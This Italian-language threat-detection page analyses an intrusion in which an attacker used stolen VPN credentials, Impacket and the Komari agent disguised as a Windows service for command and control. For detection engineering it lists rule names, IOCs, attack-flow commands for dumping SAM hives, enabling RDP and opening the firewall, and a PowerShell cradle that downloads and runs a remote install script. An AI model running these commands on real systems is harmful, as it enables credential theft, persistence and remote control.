Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Un attore di minacce ha utilizzato credenziali VPN rubate per accedere a una workstation Windows di un partner Huntress, quindi ha abilitato RDP e distribuito l’agente di monitoraggio open-source Komari come servizio a livello di SISTEMA mascherato come Windows Update Service tramite NSSM. Una volta installato, l’agente ha stabilito una connessione WebSocket persistente verso un’infrastruttura controllata dall’attaccante e ha fornito funzionalità come l’esecuzione di comandi, accesso al terminale e ping in stile heartbeat. In pratica, lo strumento ha funzionato come un framework di comando e controllo leggero senza richiedere ulteriori armamentazioni.
Indagine
L’intrusione è iniziata con un accesso SSL VPN originato da 45.153.34.132, seguito dall’uso di smbexec.py di Impacket per abilitare RDP ed eseguire una serie di comandi remoti. Gli investigatori hanno scoperto che un one-liner PowerShell ha scaricato l’installer di Komari direttamente da GitHub e l’ha registrato come servizio di Windows. Quel servizio ha quindi avviato komari-agent.exe, aperto una sessione WebSocket verso il server dell’attaccante e abilitato l’esecuzione di comandi remoti arbitrari sull’host.
Mitigazione
Huntress ha risposto isolando la workstation compromessa, disabilitando l’account utente interessato e fermando il servizio Komari creato da NSSM. La connessione WebSocket malevola è stata bloccata e il meccanismo di persistenza è stato rimosso dal sistema. Le difese di follow-up raccomandate includono il rafforzamento dei controlli di accesso VPN, il monitoraggio della creazione di servizi sospetti, l’ispezione delle attività WebSocket in uscita e il rafforzamento della sicurezza RDP.
Risposta
I difensori dovrebbero rilevare la creazione di un servizio Windows denominato Windows Update Service che punta a komari-agent.exe, monitorare le connessioni WebSocket in uscita di lunga durata verso host sconosciuti e allertare sull’uso di strumenti Impacket come smbexec.py per il movimento laterale. Se identificato, il endpoint interessato dovrebbe essere immediatamente contenuto, le credenziali compromesse revocate e il servizio rogue rimosso dall’ambiente.
graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef process fill:#e6e6fa %% Nodes – Actions / Techniques action_initial_access[“<b>Action</b> – <b>T1078 Valid Accounts</b><br/><b>Description</b>: Use stolen VPN credentials to establish an SSLVPN session and gain initial access.”] class action_initial_access technique action_cred_dump[“<b>Action</b> – <b>T1552.002 Unsecured Credentials</b><br/><b>Description</b>: Dump SAM, System and Security registry hives to obtain password hashes.”] class action_cred_dump technique action_enable_rdp[“<b>Action</b> – <b>T1599 Network Boundary Bridging</b><br/><b>Description</b>: Modify the registry key fDenyTSConnections to enable Remote Desktop Protocol access.”] class action_enable_rdp technique action_firewall_rule[“<b>Action</b> – <b>T1562.004 Impair Defenses</b><br/><b>Description</b>: Create a firewall rule named Allow RDP that opens inbound TCP port 3389.”] class action_firewall_rule technique %% Nodes – Tools / Processes tool_vpn[“<b>Tool</b> – <b>Name</b>: VPN Client<br/><b>Purpose</b>: Connect to corporate network via SSLVPN.”] class tool_vpn tool process_regdump[“<b>Process</b> – <b>Command</b>: reg save HKLM\SYSTEM\…<br/><b>Description</b>: Dump SAM, System and Security hives.”] class process_regdump process process_reg_modify[“<b>Process</b> – <b>Command</b>: reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f<br/><b>Description</b>: Enable RDP through registry modification.”] class process_reg_modify process process_fw_rule[“<b>Process</b> – <b>Command</b>: netsh advfirewall firewall add rule name=”Allow RDP” dir=in action=allow protocol=TCP localport=3389<br/><b>Description</b>: Add firewall rule to allow inbound RDP traffic.”] class process_fw_rule process %% Connections action_initial_access –>|uses| tool_vpn action_initial_access –>|leads to| action_cred_dump action_cred_dump –>|uses| process_regdump action_cred_dump –>|leads to| action_enable_rdp action_enable_rdp –>|uses| process_reg_modify action_enable_rdp –>|leads to| action_firewall_rule action_firewall_rule –>|uses| process_fw_rule
Flusso dell’attacco
Rilevazioni
Possibili modelli di linea di comando Impacket (tramite cmdline)
Vedi
Possibile esecuzione di codice remoto usando Impacket (tramite cmdline)
Vedi
Esecuzione di script PowerShell in directory sospetta usando la politica di bypass (tramite cmdline)
Vedi
Download o Upload tramite PowerShell (tramite cmdline)
Vedi
Possibili shadowing dei servizi di Desktop Remoto (tramite process_creation)
Vedi
Modifiche del firewall sospette tramite CLI (tramite cmdline)
Vedi
Processo sospetto utilizza un URL nella linea di comando (tramite cmdline)
Vedi
Software alternativo per accesso/gestione remoto (tramite process_creation)
Vedi
IOC (HashSha256) per rilevare: Komari: Lo strumento di “Monitoraggio” che non aveva bisogno di armamenti
Vedi
IOC (SourceIP) per rilevare: Komari: Lo strumento di “Monitoraggio” che non aveva bisogno di armamenti
Vedi
IOC (DestinationIP) per rilevare: Komari: Lo strumento di “Monitoraggio” che non aveva bisogno di armamenti
Vedi
Rilevazione di Impacket smbexec.py ed esecuzione di cmd.exe tramite RDP [Creazione Processo Windows]
Vedi
Esecuzione PowerShell per installazione agente Komari [Windows PowerShell]
Vedi
Rilevare la persistenza dell’agente Komari tramite Windows Update Service [Windows System]
Vedi
Rilevazione di accesso non autorizzato a SSLVPN e attività post-compromissione [Firewall]
Vedi
Esecuzione di simulazione
Prerequisito: Il Controllo Pronto Volo di Telemetria & Baseline deve essere superato.
-
Narrativa e Comandi Attacco:
Un avversario ha ottenuto un appoggio su un host Windows e vuole installare l’agente Komari C2 per mantenere la persistenza e in seguito estrarre credenziali (T1003.001). Per evitare di attivare le difese di blocco script tradizionali, l’attaccante esegue PowerShell con-ExecutionPolicy Bypasse scarica direttamente l’installer dal repository pubblico GitHub. La linea di comando corrisponde esattamente alla regola di rilevazione, generando la telemetria attesa. -
Script di test di regressione:
# Simulazione di installazione agente Komari $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1" $script = (New-Object System.Net.WebClient).DownloadString($url) Invoke-Expression $script -
Comandi di pulizia:
# Rimuovere tutti i file creati dall'installer simulato (se presenti) Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue # Fermare qualsiasi processo Komari che potrebbe essere stato avviato Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force